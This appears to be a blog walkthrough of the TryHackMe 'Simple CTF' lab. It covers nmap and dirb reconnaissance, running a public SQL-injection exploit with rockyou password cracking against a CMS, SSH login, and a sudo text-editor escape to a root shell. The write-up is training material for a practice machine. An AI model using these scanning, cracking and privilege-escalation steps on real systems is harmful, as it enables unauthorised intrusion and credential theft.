Written by Simon

Walkthrough for the TryHackMe Simple CTF

The Room is available at https://tryhackme.com/room/easyctf

Recon

Lets see what we are dealing with.

First an nmap scan of all 65535 ports to see what we is available on the machine

sudo nmap -sS -p- -T4 X.X.X.X -vv
  • -sS to run a Syn/Stealth scan
  • -p- to scan all 65545 ports
  • -T4 for an agressive and noisy scan
  • -vv for very verbose so we can monitor progress of the scan

And the results are as follows

  • PORT STATE SERVICE REASON
  • 21/tcp open ftp syn-ack ttl 63
  • 80/tcp open http syn-ack ttl 63
  • 2222/tcp open EtherNetIP-1 syn-ack ttl 63

Now lets find out a little more about these ports to see what they are actually running

sudo nmap -sS -sV -p21,80,2222 -T4 10.10.0.236 -vv
  • -sS to run a Syn/Stealth scan
  • -sV to run a version scan to see what each port is doing
  • -p21,80,2222 to only scan ports 21,80,2222
  • -T4 for an agressive and noisy scan
  • -vv for very verbose so we can monitor progress of the scan

And the results are as follows

  • PORT STATE SERVICE REASON VERSION
  • 21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
  • 2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  • Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Basic Checks

Visiting http://x.x.x.x just gives as the standard Apache page, nothing very useful

We can FTP anonymously into x.x.x.x, but doing a directory listing doesn’t show any available files

Lets see if there are any hidden files or directories on this server

dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt

And we do find something possibly useful with dirb

dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt

  • There’s a robots.txt, lets see if there any interesting files or directories in it. A directory named openemr-5_0_1_3. Trying the openemr-5_0_1_3 directory gives us a 404 error, so nothing useful there.
  • http://x.x.x.x/simple does however give us something useful, its a CMS system

A little bit of reading on the page tells us that this is Simple CMS version 2.2.8. And a search on ExploitDB tells us that this version has a SQL Injection exploit available, and that there is a exploit available. https://www.exploit-db.com/exploits/46635

Exploitation

Now its time to hack in.

  • download the exploit and unzip it somewhere.
  • run it with the command python yourname.py Which gives us a warning about Python 2 becoming end of life and that there is a missing module.
  • So run pip install termcolor
  • Lets run the exploit again
python simple.py -u http://10.10.0.236/simple --crack -w /usr/share/wordlists/rockyou.txt
* python tell the system to use python
* -u points the exploit at the server
* --crack tells the exploit we are going to be some password cracking
* -w /usr/share/wordlists/rockyou.txt tells it to use the rockyou for logins and passwords

Go have a coffee and come back in 10 minutes and you will have a login and password.

Now it’s time to login to the system

ssh user@x.x.x.x -p 2222
  • ssh – lets use ssh
  • user is the isername your got from the exploit results
  • -p 2222 is because ssh is running on the non-standard port
  • the password will also be available from the exploit results

Now do a quick search for user.txt, and you have the first flag. But wait, you are currently just a regular user, can you get root?

So lets see if any programs run as root user

sudo -l

Which shows that one specific text editor does run as root.

So lets run the text editor with sudo

sudo texteditor

Then break out of the text editor by using the command

:!bash

And a quick change to the /root/ directory gives us the second flag for root.txt